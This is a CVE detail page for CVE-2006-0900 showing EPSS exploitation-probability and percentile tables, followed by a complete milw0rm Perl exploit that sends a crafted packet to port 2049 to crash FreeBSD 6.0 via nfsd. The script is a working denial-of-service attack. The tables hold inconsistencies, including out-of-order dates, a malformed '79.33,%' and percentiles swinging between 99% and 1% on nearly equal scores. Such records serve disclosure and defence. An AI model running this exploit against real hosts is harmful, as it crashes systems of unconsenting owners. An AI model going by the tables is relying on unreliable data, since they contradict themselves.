CVE-2006-0900 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	80.32%	–	–
2022-07-17	–	–	80.32%	–	–
2022-07-24	–	–	80.32%	–	–
2022-11-13	–	–	80.32%	–	–
2022-11-20	–	–	80.32%	–	–
2022-12-18	–	–	80.32%	–	–
2023-03-12	–	–	–	96.27%	–
2023-03-19	–	–	–	96.14%	–
2023-04-30	–	–	–	96.21%	–
2023-06-04	–	–	–	96.24%	–
2023-07-23	–	–	–	96.56%	–
2023-11-05	–	–	–	96.59%	–
2023-11-12	–	–	–	96.59%	–
2024-06-02	–	–	–	96.59%	–
2024-12-22	–	–	–	95.9%	–
2025-02-09	–	–	–	96.25%	–
2025-01-19	–	–	–	95.9%	–
2025-02-16	–	–	–	96.25%	–
2025-03-18	–	–	–	–	79.33%
2025-03-18	–	–	–	–	79.33,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2022-07-17	1%
2022-07-24	99%
2022-11-13	1%
2022-11-20	99%
2022-12-18	1%
2023-03-12	99%
2023-03-19	99%
2023-04-30	99%
2023-06-04	99%
2023-07-23	99%
2023-11-05	99%
2023-11-12	1%
2024-06-02	1%
2024-12-22	1%
2025-02-09	1%
2025-01-19	1%
2025-02-16	1%
2025-03-18	99%
2025-03-18	99%

#!/usr/bin/perl ## Saw an advisory on Dailydave and wrote a little script to ## check my freebsd boxes (kind of evil). /str0ke (milw0rm.com) ## ## ProtoVer NFS testsuite 1.0 uncovered remote kernel panic vulnerability in FreeBSD 6.0 kernel. ## Evgeny Legerov ## www.gleg.net use IO::Socket; sub usage { print "FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit\n"; print "Advisory from Evgeny Legerov (www.gleg.net)\n"; print "Code by str0ke (milw0rm.com)\n"; print "Usage: $0 www.example.com\n"; exit (); } my $host = shift || &usage; my $printer = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00" . "\x00\x00\x00\x02\x00\x01\x86\xa5\x00\x00\x00\x01" . "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" . "\x2f\x74\x6d\x70"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "2049") || die "\n+ Connection failed...\n"; print $socket $printer . "\n"; # milw0rm.com [2006-02-28]